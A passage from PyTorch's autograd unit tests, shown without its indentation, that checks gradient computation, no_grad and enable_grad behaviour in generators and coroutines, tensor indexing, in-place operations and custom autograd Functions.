self.assertEqual(a.grad, grad_c * b)
self.assertEqual(b.grad, grad_c * a)
self.assertEqual(q.grad, (grad_c + grad_z) * 2)
def test_multi_backward_no_grad(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=False)
z = x + y
q = y * 2
# NB: we currently raise an exception if any arguments to backwards
# have requires_grad=False and don't have a grad_fn. We may want to
# relax that check to a warning.
def call_backwards():
torch.autograd.backward([z, q], [torch.ones(5, 5), torch.ones(5, 5)])
self.assertRaises(RuntimeError, call_backwards)
def test_backward_with_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
def fn():
return x ** 2 + y * x + y ** 2
gradient = torch.ones(2, 2)
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
@torch.no_grad()
def reset_grad():
x.grad.zero_()
y.grad.zero_()
torch.autograd.backward(fn(), gradient, inputs=[x, y])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, y_grad_expected)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[x])
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(y.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=[y])
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
torch.autograd.backward(fn(), gradient, inputs=y)
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, torch.zeros(2, 2), exact_dtype=False)
reset_grad()
self.assertRaisesRegex(RuntimeError, 'cannot be empty',
lambda: torch.autograd.backward(fn(), gradient, inputs=[]))
def test_backward_with_nonleaf_inputs(self):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
x_nonleaf = x * 1
y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
x_grad_expected = 2 * x + y
y_grad_expected = x + 2 * y
x_non_leaf_expected = 2 * x_nonleaf + y
self.assertEqual(y.grad, y_grad_expected)
self.assertEqual(x.grad, x_grad_expected)
self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)
# backward doesn't have an allow_unused flag, so the behavior of backward
# when variable is not part of the graph is as if allow_used were true
# x.grad will simply be None.
out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
self.assertIsNone(z.grad)
def test_dependent_backward(self):
x = torch.randn(10, requires_grad=True)
y = x ** 2
z = y ** 3
go_y = torch.randn(10)
go_z = torch.randn(10)
torch.autograd.backward([y, z], [go_y, go_z])
xd = x
self.assertEqual(x.grad, 2 * xd * go_y + 6 * xd.pow(5) * go_z)
def test_save_output_nr(self):
x = torch.randn(10, requires_grad=True)
class MultiOutputFn(Function):
@staticmethod
def forward(ctx, x):
return x[:5], x[5:]
@staticmethod
def backward(ctx, *grad):
return torch.cat(grad)
a, b = MultiOutputFn.apply(x)
self.assertEqual(b.output_nr, 1)
class TestFn(Function):
@staticmethod
def forward(ctx, b):
ctx.save_for_backward(b)
return b * 2
@staticmethod
def backward(ctx, grad_b):
b, = ctx.saved_tensors
self.assertEqual(b.output_nr, 1)
TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build a "chain" computation graph
for _ in range(depth):
y = y + y * 0.000001
# graph deletion occurs when the above locals go out of scope.
# In this case `del y` will trigger it but it's easier to leave
# it to Python to delete the locals.
# Should not stack overflow
scope()
def test_free_deep_graph_complicated(self):
def scope():
depth = 100000
randchoice = torch.randint(2, [depth, 2])
x = torch.randn(1, requires_grad=True)
y = x.clone()
# Hold the two previous values
prev_values = [None, None]
# Build a "chain with skip connections" graph
for _ in range(depth):
prev_tensors = [tensor for tensor in prev_values[:-1]
if tensor is not None]
prev_values.append(y)
prev_values.pop(0)
# Definitely pick one tensor to add
y += y * 0.000001
# Possibly add other tensors
nprev = len(prev_tensors)
if nprev == 2:
y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_free_deep_graph_pyfunction(self):
class MyOp(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
return grad_output, grad_output
def scope():
depth = 150000
x = torch.randn(1, requires_grad=True)
y = x.clone()
# build deeply nested computation graph
for _ in range(depth):
y = MyOp.apply(y, y)
# graph deletion occurs when the above locals go out of scope.
# Should not stack overflow
scope()
def test_no_unnecessary_save(self):
# If we kept x in the derivative Function of x * 2 we would
# get an error in the backward that would complain that we've
# modified x, which was needed for gradient computation.
# Since we should elide unnecessary saves, this test should pass.
mu = torch.ones(1, requires_grad=True)
x = torch.empty(1)
loss = 0
for i in range(3):
x.detach_()
x.copy_(mu + i)
ft = torch.tensor([float(i)])
multiplied = x * ft
s = multiplied.sum()
loss += s
loss.backward()
def test_no_grad(self):
x = torch.ones(5, 5, requires_grad=True)
y = torch.ones(5, 5) * 4
with torch.no_grad():
w = x + y
@torch.no_grad()
def adder(x, y):
return x + y
z = adder(x, y)
self.assertFalse(w.requires_grad)
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
self.assertIsNone(w.grad_fn)
self.assertFalse(z.requires_grad)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
self.assertIsNone(z.grad_fn)
# test nested decorator and with-statement on no_grad
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
w = adder(x, y)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
@torch.no_grad()
def gen_no_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), False)
yield i
with torch.enable_grad():
for _ in gen_no_grad():
self.assertEqual(torch.is_grad_enabled(), True)
@torch.enable_grad()
def gen_enable_grad():
for i in range(10):
self.assertEqual(torch.is_grad_enabled(), True)
yield i
with torch.no_grad():
for _ in gen_enable_grad():
self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
# enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
# recursively, to ensure that the decorators preserve the caller's setting
@torch.enable_grad()
def enable_grad_decorator_recursive(depth):
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_decorator_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
@torch.no_grad()
def no_grad_decorator_recursive(depth):
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_decorator_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
# enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
# each other recursively, to ensure that the decorators preserve the caller's setting
def enable_grad_context_manager_recursive(depth):
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
if depth > 0:
no_grad_context_manager_recursive(depth - 1)
self.assertTrue(torch.is_grad_enabled())
def no_grad_context_manager_recursive(depth):
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
if depth > 0:
enable_grad_context_manager_recursive(depth - 1)
self.assertFalse(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertTrue(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertTrue(torch.is_grad_enabled())
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
enable_grad_decorator_recursive(10)
self.assertFalse(torch.is_grad_enabled())
enable_grad_context_manager_recursive(10)
self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
@torch.no_grad()
def coro_no_grad(n=10):
self.assertFalse(torch.is_grad_enabled())
for i in range(n):
self.assertFalse(torch.is_grad_enabled())
r = yield i
self.assertFalse(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertFalse(torch.is_grad_enabled())
@torch.enable_grad()
def coro_enable_grad(n=10):
self.assertTrue(torch.is_grad_enabled())
for i in range(n):
self.assertTrue(torch.is_grad_enabled())
r = yield i
self.assertTrue(torch.is_grad_enabled())
self.assertEqual(i, r)
self.assertTrue(torch.is_grad_enabled())
with torch.enable_grad():
self.assertTrue(torch.is_grad_enabled())
coro, r = coro_no_grad(), None
try:
while True:
self.assertTrue(torch.is_grad_enabled())
r = coro.send(r)
self.assertTrue(torch.is_grad_enabled())
except StopIteration:
pass
with torch.no_grad():
self.assertFalse(torch.is_grad_enabled())
coro, r = coro_enable_grad(), None
try:
while True:
self.assertFalse(torch.is_grad_enabled())
r = coro.send(r)
self.assertFalse(torch.is_grad_enabled())
except StopIteration:
pass
def test_set_grad_coroutines_benign_exceptions(self):
class RecoverableException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertFalse(torch.is_grad_enabled())
has_raised = True
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except RecoverableException:
self.assertTrue(torch.is_grad_enabled())
has_raised = True
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
try:
while True:
r = coro.throw(RecoverableException)
self.assertLess(r, 0)
except StopIteration:
pass
def test_set_grad_coroutines_critical_exceptions(self):
class UnrecoverableException(Exception):
pass
class SecondaryException(Exception):
pass
@torch.no_grad()
def coro_no_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertFalse(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertFalse(torch.is_grad_enabled())
raise SecondaryException
@torch.enable_grad()
def coro_enable_grad(n=10):
has_raised = False
for i in range(n):
try:
self.assertTrue(torch.is_grad_enabled())
yield (-i if has_raised else i)
except UnrecoverableException:
self.assertTrue(torch.is_grad_enabled())
raise SecondaryException
with torch.enable_grad():
coro = coro_no_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
with torch.no_grad():
coro = coro_enable_grad()
assert 0 == next(coro)
with self.assertRaises(SecondaryException):
coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
@torch.no_grad()
def coro_no_grad(state):
for i in range(10):
try:
self.assertFalse(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertFalse(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
@torch.enable_grad()
def coro_enable_grad(state):
for i in range(10):
try:
self.assertTrue(torch.is_grad_enabled())
yield i
except GeneratorExit:
self.assertTrue(torch.is_grad_enabled())
state.add('GeneratorExit')
raise
state = set()
with torch.enable_grad():
coro = coro_no_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
state = set()
with torch.no_grad():
coro = coro_enable_grad(state)
for i in range(5):
next(coro)
coro.close()
self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
"""Python Functions should respect grad mode."""
x = torch.ones(5, 5, requires_grad=True)
class MyOp(Function):
@staticmethod
def forward(self, x):
return x + 1
@staticmethod
def backward(self, dy):
return dy
with torch.no_grad():
y = MyOp.apply(x)
self.assertFalse(y.requires_grad)
def test_indexing(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
def compare(x, y, idx, indexed_tensor, indexed_var):
indexed_var_t = indexed_var.data
if not isinstance(indexed_tensor, torch.Tensor):
indexed_var_t = indexed_var_t[0]
self.assertEqual(indexed_tensor, indexed_var_t)
indexed_var.sum().backward()
expected_grad = torch.empty(x.size()).fill_(0)
expected_grad[idx] = 1
self.assertEqual(y.grad, expected_grad)
def check_index(x, y, idx):
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[idx]
indexed_var = y[idx]
compare(x, y, idx, indexed_tensor, indexed_var)
check_index(x, y, 1)
check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing, with less dim, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.autograd.torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = map(lambda warn:
'deprecated' in str(warn) and
'saved_variables' in str(warn),
warns)
has_deprecated = reduce(lambda x, y: x or y, has_deprecated)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need it's inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is a the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_ouptuts to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case when x broadcasts to as y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
